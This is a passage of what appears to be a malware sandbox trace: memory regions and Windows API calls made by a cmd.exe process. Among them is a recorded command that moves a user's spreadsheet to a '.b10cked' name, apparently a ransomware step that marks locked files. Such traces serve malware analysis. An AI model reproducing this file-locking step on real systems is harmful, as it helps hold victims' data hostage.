11688 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 11689 start_va = 0x3b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 11690 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 11691 start_va = 0x3e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 11692 start_va = 0x4f0000 end_va = 0x10effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 11693 start_va = 0x10f0000 end_va = 0x1252fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010f0000" filename = "" Thread: id = 155 os_tid = 0x4e4 [0130.703] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fdf4 | out: lpSystemTimeAsFileTime=0x26fdf4*(dwLowDateTime=0x87d5f600, dwHighDateTime=0x1d440a9)) [0130.703] GetCurrentProcessId () returned 0x53c [0130.703] GetCurrentThreadId () returned 0x4e4 [0130.704] GetTickCount () returned 0x29b73 [0130.704] QueryPerformanceCounter (in: lpPerformanceCount=0x26fdec | out: lpPerformanceCount=0x26fdec*=18749275970) returned 1 [0130.704] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0130.704] __set_app_type (_Type=0x1) [0130.704] __p__fmode () returned 0x76b331f4 [0130.704] __p__commode () returned 0x76b331fc [0130.704] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0130.704] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0130.704] GetCurrentThreadId () returned 0x4e4 [0130.704] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x4e4) returned 0x38 [0130.705] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0130.705] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0130.705] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.705] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0130.705] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fd84 | out: phkResult=0x26fd84*=0x0) returned 0x2 [0130.705] VirtualQuery (in: lpAddress=0x26fdbb, lpBuffer=0x26fd54, dwLength=0x1c | out: lpBuffer=0x26fd54*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0130.705] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fd54, dwLength=0x1c | out: lpBuffer=0x26fd54*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0130.705] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fd54, dwLength=0x1c | out: lpBuffer=0x26fd54*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0130.705] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fd54, dwLength=0x1c | out: lpBuffer=0x26fd54*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0130.705] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fd54, dwLength=0x1c | out: lpBuffer=0x26fd54*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0130.705] GetConsoleOutputCP () returned 0x1b5 [0130.705] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0130.705] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0130.705] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.705] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0130.705] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.705] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0130.706] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.706] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0130.706] _get_osfhandle (_FileHandle=0) returned 0x3 [0130.706] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0130.706] _get_osfhandle (_FileHandle=0) returned 0x3 [0130.706] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0130.706] GetEnvironmentStringsW () returned 0x80168* [0130.706] FreeEnvironmentStringsW (penv=0x80168) returned 1 [0130.706] GetEnvironmentStringsW () returned 0x80168* [0130.706] FreeEnvironmentStringsW (penv=0x80168) returned 1 [0130.706] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ecf4 | out: phkResult=0x26ecf4*=0x40) returned 0x0 [0130.706] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ecfc, lpData=0x26ed00, lpcbData=0x26ecf8*=0x1000 | out: lpType=0x26ecfc*=0x0, lpData=0x26ed00*=0x90, lpcbData=0x26ecf8*=0x1000) returned 0x2 [0130.706] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ecfc, lpData=0x26ed00, lpcbData=0x26ecf8*=0x1000 | out: lpType=0x26ecfc*=0x4, lpData=0x26ed00*=0x1, lpcbData=0x26ecf8*=0x4) returned 0x0 [0130.707] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ecfc, lpData=0x26ed00, lpcbData=0x26ecf8*=0x1000 | out: lpType=0x26ecfc*=0x0, lpData=0x26ed00*=0x1, lpcbData=0x26ecf8*=0x1000) returned 0x2 [0130.707] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ecfc, lpData=0x26ed00, lpcbData=0x26ecf8*=0x1000 | out: lpType=0x26ecfc*=0x4, lpData=0x26ed00*=0x0, lpcbData=0x26ecf8*=0x4) returned 0x0 [0130.707] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ecfc, lpData=0x26ed00, lpcbData=0x26ecf8*=0x1000 | out: lpType=0x26ecfc*=0x4, lpData=0x26ed00*=0x40, lpcbData=0x26ecf8*=0x4) returned 0x0 [0130.707] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ecfc, lpData=0x26ed00, lpcbData=0x26ecf8*=0x1000 | out: lpType=0x26ecfc*=0x4, lpData=0x26ed00*=0x40, lpcbData=0x26ecf8*=0x4) returned 0x0 [0130.707] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ecfc, lpData=0x26ed00, lpcbData=0x26ecf8*=0x1000 | out: lpType=0x26ecfc*=0x0, lpData=0x26ed00*=0x40, lpcbData=0x26ecf8*=0x1000) returned 0x2 [0130.707] RegCloseKey (hKey=0x40) returned 0x0 [0130.707] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ecf4 | out: phkResult=0x26ecf4*=0x40) returned 0x0 [0130.707] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ecfc, lpData=0x26ed00, lpcbData=0x26ecf8*=0x1000 | out: lpType=0x26ecfc*=0x0, lpData=0x26ed00*=0x40, lpcbData=0x26ecf8*=0x1000) returned 0x2 [0130.707] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ecfc, lpData=0x26ed00, lpcbData=0x26ecf8*=0x1000 | out: lpType=0x26ecfc*=0x4, lpData=0x26ed00*=0x1, lpcbData=0x26ecf8*=0x4) returned 0x0 [0130.707] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ecfc, lpData=0x26ed00, lpcbData=0x26ecf8*=0x1000 | out: lpType=0x26ecfc*=0x0, lpData=0x26ed00*=0x1, lpcbData=0x26ecf8*=0x1000) returned 0x2 [0130.707] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ecfc, lpData=0x26ed00, lpcbData=0x26ecf8*=0x1000 | out: lpType=0x26ecfc*=0x4, lpData=0x26ed00*=0x0, lpcbData=0x26ecf8*=0x4) returned 0x0 [0130.707] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ecfc, lpData=0x26ed00, lpcbData=0x26ecf8*=0x1000 | out: lpType=0x26ecfc*=0x4, lpData=0x26ed00*=0x9, lpcbData=0x26ecf8*=0x4) returned 0x0 [0130.707] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ecfc, lpData=0x26ed00, lpcbData=0x26ecf8*=0x1000 | out: lpType=0x26ecfc*=0x4, lpData=0x26ed00*=0x9, lpcbData=0x26ecf8*=0x4) returned 0x0 [0130.707] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ecfc, lpData=0x26ed00, lpcbData=0x26ecf8*=0x1000 | out: lpType=0x26ecfc*=0x0, lpData=0x26ed00*=0x9, lpcbData=0x26ecf8*=0x1000) returned 0x2 [0130.707] RegCloseKey (hKey=0x40) returned 0x0 [0130.707] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886365 [0130.707] srand (_Seed=0x5b886365) [0130.707] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\BUW1GW~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\bUW1gWS4k.xlsx.b10cked\"" [0130.707] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\BUW1GW~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\bUW1gWS4k.xlsx.b10cked\"" [0130.707] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0130.708] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x818c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0130.708] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0130.708] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0130.708] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0130.708] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0130.708] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0130.708] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0130.708] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0130.708] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0130.708] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0130.708] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0130.708] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0130.708] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0130.708] GetEnvironmentStringsW () returned 0x822b8* [0130.708] FreeEnvironmentStringsW (penv=0x822b8) returned 1 [0130.708] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.708] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0130.708] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0130.708] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0130.708] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0130.708] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0130.708] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0130.708] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0130.708] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0130.708] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0130.708] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26fac0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0130.709] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26fac0, lpFilePart=0x26fabc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26fabc*="Desktop") returned 0x18 [0130.709] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0130.709] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f83c | out: lpFindFileData=0x26f83c) returned 0x7fff8 [0130.709] FindClose (in: hFindFile=0x7fff8 | out: hFindFile=0x7fff8) returned 1 [0130.709] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f83c | out: lpFindFileData=0x26f83c) returned 0x7fff8 [0130.709] FindClose (in: hFindFile=0x7fff8 | out: hFindFile=0x7fff8) returned 1 [0130.709] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f83c | out: lpFindFileData=0x26f83c) returned 0x7fff8 [0130.709] FindClose (in: hFindFile=0x7fff8 | out: hFindFile=0x7fff8) returned 1 [0130.709] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0130.709] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0130.709] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0130.709] GetEnvironmentStringsW () returned 0x82ad8* [0130.710] FreeEnvironmentStringsW (penv=0x82ad8) returned 1 [0130.710] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0130.710] GetConsoleOutputCP () returned 0x1b5 [0130.710] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0130.710] GetUserDefaultLCID () returned 0x409 [0130.710] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0130.710] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26fc00, cchData=128 | out: lpLCData="0") returned 2 [0130.711] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26fc00, cchData=128 | out: lpLCData="0") returned 2 [0130.711] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26fc00, cchData=128 | out: lpLCData="1") returned 2 [0130.711] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0130.711] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0130.711] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0130.711] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0130.711] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0130.711] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0130.711] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0130.711] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0130.711] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0130.711] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0130.711] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0130.712] GetConsoleTitleW (in: lpConsoleTitle=0x708d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.712] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0130.712] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0130.712] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0130.712] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0130.713] _wcsicmp (_String1="move", _String2=")") returned 68 [0130.713] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0130.713] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0130.713] _wcsicmp (_String1="IF", _String2="move") returned -4 [0130.713] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0130.713] _wcsicmp (_String1="REM", _String2="move") returned 5 [0130.713] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0130.716] GetConsoleTitleW (in: lpConsoleTitle=0x26f8f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.717] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0130.717] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0130.717] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0130.717] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0130.717] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0130.717] _wcsicmp (_String1="move", _String2="CD") returned 10 [0130.717] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0130.717] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0130.717] _wcsicmp (_String1="move", _String2="REN") returned -5 [0130.717] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0130.717] _wcsicmp (_String1="move", _String2="SET") returned -6 [0130.717] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0130.717] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0130.717] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0130.717] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0130.717] _wcsicmp (_String1="move", _String2="MD") returned 11 [0130.717] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0130.717] _wcsicmp (_String1="move", _String2="RD") returned -5 [0130.717] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0130.717] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0130.717] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0130.717] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0130.717] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0130.717] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0130.717] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0130.717] _wcsicmp (_String1="move", _String2="VER") returned -9 [0130.717] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0130.717] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0130.717] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0130.717] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0130.717] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0130.717] _wcsicmp (_String1="move", _String2="START") returned -6 [0130.717] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0130.717] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0130.717] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0130.719] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0130.719] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0130.719] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f6b4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f6ac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f6ac*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.720] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.720] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.720] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.720] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.720] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.720] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0130.720] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0130.720] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0130.720] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0130.720] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0130.720] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0130.720] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0130.720] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0130.720] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0130.720] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0130.720] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0130.720] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0130.720] _wcsicmp (_String1="BUW1GW~1.XLS", _String2=".") returned 52 [0130.720] _wcsicmp (_String1="BUW1GW~1.XLS", _String2="..") returned 52 [0130.720] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BUW1GW~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\buw1gw~1.xls")) returned 0x20 [0130.720] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x81d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0130.721] SetErrorMode (uMode=0x0) returned 0x0 [0130.721] SetErrorMode (uMode=0x1) returned 0x0 [0130.721] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BUW1GW~1.XLS", nBufferLength=0x104, lpBuffer=0x26f03c, lpFilePart=0x26f024 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\BUW1GW~1.XLS", lpFilePart=0x26f024*="BUW1GW~1.XLS") returned 0x26 [0130.721] SetErrorMode (uMode=0x0) returned 0x1 [0130.721] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0130.721] _wcsicmp (_String1="BUW1GW~1.XLS", _String2=".") returned 52 [0130.721] _wcsicmp (_String1="BUW1GW~1.XLS", _String2="..") returned 52 [0130.721] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BUW1GW~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\buw1gw~1.xls")) returned 0x20 [0130.721] SetErrorMode (uMode=0x0) returned 0x0 [0130.721] SetErrorMode (uMode=0x1) returned 0x0 [0130.721] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BUW1GW~1.XLS", nBufferLength=0x104, lpBuffer=0x26f4b8, lpFilePart=0x26f250 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\BUW1GW~1.XLS", lpFilePart=0x26f250*="BUW1GW~1.XLS") returned 0x26 [0130.721] SetErrorMode (uMode=0x0) returned 0x1 [0130.721] SetErrorMode (uMode=0x0) returned 0x0 [0130.721] SetErrorMode (uMode=0x1) returned 0x0 [0130.721] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\bUW1gWS4k.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x26f6c0, lpFilePart=0x26f250 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\bUW1gWS4k.xlsx.b10cked", lpFilePart=0x26f250*="bUW1gWS4k.xlsx.b10cked") returned 0x30 [0130.721] SetErrorMode (uMode=0x0) returned 0x1 [0130.831] SetLastError (dwErrCode=0x0) [0130.831] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\bUW1gWS4k.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\buw1gws4k.xlsx.b10cked")) returned 0xffffffff [0130.831] GetLastError () returned 0x2 [0130.831] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BUW1GW~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x26ebcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebcc) returned 0x70ef8 [0130.831] FindNextFileW (in: hFindFile=0x70ef8, lpFindFileData=0x26ebcc | out: lpFindFileData=0x26ebcc) returned 0 [0130.832] GetLastError () returned 0x12 [0130.832] FindClose (in: hFindFile=0x70ef8 | out: hFindFile=0x70ef8) returned 1 [0130.832] FindFirstFileExW (in: 